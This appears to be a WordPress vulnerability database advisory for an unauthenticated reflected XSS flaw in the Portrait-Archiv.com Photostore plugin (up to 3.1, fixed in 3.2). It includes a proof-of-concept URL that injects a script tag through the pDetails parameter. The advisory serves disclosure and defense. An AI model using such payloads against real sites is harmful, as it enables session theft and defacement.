WordPress Plugin Vulnerabilities

Portrait-Archiv.com Photostore <= 3.1 - Unauthenticated Reflected XSS

Description

The 'pDetails' GET parameter from the js/imageDetails.php was vulnerable to an unauthenticated reflected XSS attack.

Proof of Concept

http://www.example.com/wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?pDetails=);});</script><script>alert("XSS")</script>

Affects Plugins

Plugin icon
portrait-archiv-shop
Fixed in 3.2

References

URL
https://packetstormsecurity.com/files/#154343/
URL
https://plugins.trac.wordpress.org/changeset/2156762/portrait-archiv-shop

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Ricardo Sanchez
Verified
Yes
WPVDB ID
c6a8757e-41ef-4c20-8c7d-97b57d56fe0e

Timeline

Publicly Published
2019-09-03 (about 4 years ago)
Added
2019-09-04 (about 4 years ago)
Last Updated
2020-02-13 (about 4 years ago)

Other

Published
Title
Published
2023-10-29
Title
Accordion < 2.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Published
2015-05-06
Title
ClickBank Affiliate Ads < 1.35 - Admin+ Stored Cross-Site Scripting
Published
2023-04-20
Title
Verified Reviews < 2.3.15 - Admin+ Stored XSS
Published
2023-06-08
Title
WP Mail Logging < 1.11.2 - Unauthenticated Stored Cross-Site Scripting
Published
2023-12-26
Title
weForms – Easy Drag & Drop Contact Form Builder For WordPress < 1.6.18 - Authenticated (Admin+) Stored Cross-Site Scripting